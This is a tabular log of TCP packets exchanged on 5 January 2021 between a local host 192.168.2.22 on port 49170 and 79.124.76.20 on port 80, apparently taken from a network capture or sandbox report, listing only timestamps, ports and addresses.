Jan 5, 2021 10:06:48.654654980 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.654711962 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.654741049 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.654942989 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.654968977 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.654972076 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.655133963 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.655194044 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.655221939 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.655286074 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.655368090 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.655400991 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.655445099 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.655693054 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.655982018 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.656012058 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.656045914 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.656069994 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.656091928 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.656092882 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.656105042 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.656145096 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.656176090 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.656287909 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.656573057 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.656577110 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.656598091 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.656651974 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.656727076 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.656850100 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.656918049 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.657008886 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.657032013 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.657068014 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.657215118 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.657243013 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.657365084 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.657366991 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.657449007 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.657505035 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.657612085 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.657685995 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.657851934 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.657882929 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.658004045 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.658082962 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.658205032 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.658327103 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.658442974 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.658759117 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.658785105 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.658883095 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.659090042 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.659358978 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.659394026 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.659425020 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.659447908 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.659563065 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.659598112 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.659756899 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.659770012 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.659837961 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.659861088 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.660104990 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.660130024 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.660244942 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.660404921 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.660492897 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.660506964 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.660531998 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.660681963 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.660721064 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.660938025 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.660962105 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.661148071 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.661173105 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.661366940 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.661411047 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.661603928 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.661631107 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.661745071 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.661780119 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.661830902 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.661854029 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.661896944 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.662040949 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.662081003 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.662286997 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.662321091 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.662525892 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.662550926 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.662647009 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.662841082 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.662880898 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.663084984 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.663166046 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.663196087 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.663219929 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.663223982 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.663324118 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.663358927 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.663398027 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.663527012 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.663603067 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.663762093 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.663795948 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.663800955 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.663856030 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.664005995 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.664040089 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.664163113 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.664243937 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.664267063 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.664297104 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.664304972 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.664416075 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.664478064 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.664555073 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.664693117 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.664773941 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.664850950 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.664927006 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.664968014 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.665004015 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.665127993 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.665301085 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.665328026 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.665400028 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.665540934 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.665597916 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.665621996 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.665879965 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.668677092 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.668714046 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.668762922 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.668849945 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.668970108 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.669070005 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.669074059 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.669197083 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.669249058 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.669322014 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.669557095 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.669580936 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.669626951 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.669780970 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.669811964 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.670013905 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.670017004 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.670037985 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.670089960 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.670233011 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.670257092 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.670315981 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.670339108 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.670448065 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.670564890 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.670654058 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.670768976 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.670891047 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.673124075 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.674720049 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.674747944 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.674858093 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.674938917 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.674959898 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.675003052 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.675132036 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.675164938 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.675215006 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.675381899 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.675403118 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.675482988 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.675576925 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.675600052 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.675792933 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.675825119 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.676073074 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.676107883 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.676188946 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.676201105 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.676302910 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.676326036 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.676398993 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.676490068 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.676521063 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.676567078 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.680705070 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.680737019 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.680860996 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.680896997 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.680953026 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.680975914 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.681104898 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.681128025 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.681339979 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.681358099 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.681368113 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.681418896 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.681588888 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.684547901 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.684583902 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.684613943 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.684699059 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.684776068 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.684823036 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.684932947 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.685061932 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.685065985 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.685132027 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.685220957 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.685399055 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.685425043 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.685480118 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.685631990 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.685657978 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.685838938 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.685863018 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.686068058 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.686094046 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.686264038 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.686300039 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.686332941 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.686404943 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.686534882 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.686558962 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.686744928 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.686774015 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.687110901 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.687133074 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.687295914 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.687375069 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.687572956 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.687597990 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.687820911 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.687849045 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.687978983 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.688219070 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.688246965 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.688436031 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.688458920 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.688668966 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.688694954 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.688921928 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.688952923 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.689271927 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.689296007 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.689378977 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.689440966 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.689445972 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.689466953 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.689490080 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.689604044 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.689712048 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.689734936 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.689783096 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.689932108 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.689954996 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.690089941 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.690186024 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.690207005 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.690316916 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.690370083 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.690391064 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.690434933 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.690612078 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.690633059 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.690694094 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.690823078 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.690853119 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.691066980 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.691087961 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.691282034 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.691306114 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.691524982 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.691548109 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.691740990 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.691765070 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.691972971 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.691996098 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.692215919 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.692243099 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.692409992 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.692442894 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.692694902 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.692720890 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.692847967 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.692856073 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.692887068 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.692910910 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.692956924 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.693099976 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.693135023 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.693193913 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.693337917 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.693371058 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.693523884 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.693597078 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.693625927 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.693670034 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.693778038 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.693814039 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.693911076 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.694019079 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.694042921 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.694088936 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.694219112 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.694340944 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.694387913 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.694442987 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.694499969 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.694653988 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.694681883 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.694736004 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.694777966 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.694900036 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.694942951 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.695106030 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.695158005 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.695180893 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.695236921 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.695373058 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.695398092 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.695445061 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.695604086 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.695630074 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.695828915 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.695835114 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.695862055 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.695935965 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.695955992 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.696063995 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.696110964 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.696142912 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.696259975 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.696382046 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.696623087 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.696646929 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.696827888 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.696902037 CET	80	49170	79.124.76.20	192.168.2.22
